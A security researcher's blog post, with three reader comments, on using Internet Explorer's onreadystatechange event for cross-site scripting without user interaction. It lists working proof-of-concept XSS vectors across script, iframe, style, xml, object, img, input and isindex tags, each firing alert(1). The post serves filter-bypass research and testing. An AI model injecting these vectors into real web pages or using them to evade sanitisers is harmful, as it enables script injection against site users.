onreadystatechange

I like this event, it’s pretty cool. The reason why it’s interesting from a XSS perspective is that it is executed automatically without user interaction. This is rare in the XSS playground, usually you have to use onerror, onload or onfocus events and they only work in certain circumstances.

I’d better mention that the event is only relevant to Internet Explorer as far as I’m aware. If you know of any other browsers it works in then please leave a comment.

So which tags does it execute in? Well more than you first think. At first I could only get it to execute automatically with the iframe, script and style tags. But actually the img, image, input, isindex, iframe, script, style, xml and object tags all execute without user interaction.

Here are a list of vectors I found, notice the XML tag requires some content in order to execute, this can be accomplished without a closing tag or just some text. The object tag requires the type=image attribute. IMG, IMAGE, ISINDEX, INPUT all require a valid image loaded with the src attribute.

<script onreadystatechange=alert(1)>
<iframe onreadystatechange=alert(1)>
<style onreadystatechange=alert(1)>
<script onreadystatechange=alert(1)></script>
<iframe onreadystatechange=alert(1)></iframe>
<style onreadystatechange=alert(1)></style>
<xml onreadystatechange=alert(1)>
<xml onreadystatechange=alert(1)>test</xml>
<object type=image src=http://www.businessinfo.co.uk/labs/hackvertor/images/logo.gif onreadystatechange=alert(1)></object>
<img type=image src=http://www.businessinfo.co.uk/labs/hackvertor/images/logo.gif onreadystatechange=alert(1)>
<image type=image src=http://www.businessinfo.co.uk/labs/hackvertor/images/logo.gif onreadystatechange=alert(1)>
<input type=image src=http://www.businessinfo.co.uk/labs/hackvertor/images/logo.gif onreadystatechange=alert(1)>
<isindex type=image src=http://www.businessinfo.co.uk/labs/hackvertor/images/logo.gif onreadystatechange=alert(1)>

3 Responses to “onreadystatechange”

  1. Klaas writes:

    Hey,
    I’ve tried this in IE6 and IE8 but can not reproduce it. Even the <script onreadystate=alert(1)> didn’t work for me.

    Can you explain a bit more how you achieved it? Otherwise I would say IE is not vulnerable…

  2. Gareth Heyes writes:

    it should be onreadystatechange sorry I must have been tired

  3. Kai Sellgren writes:

    I just wrote a big reply, but it appeared to be spam…

    Great.

    You should fix your site.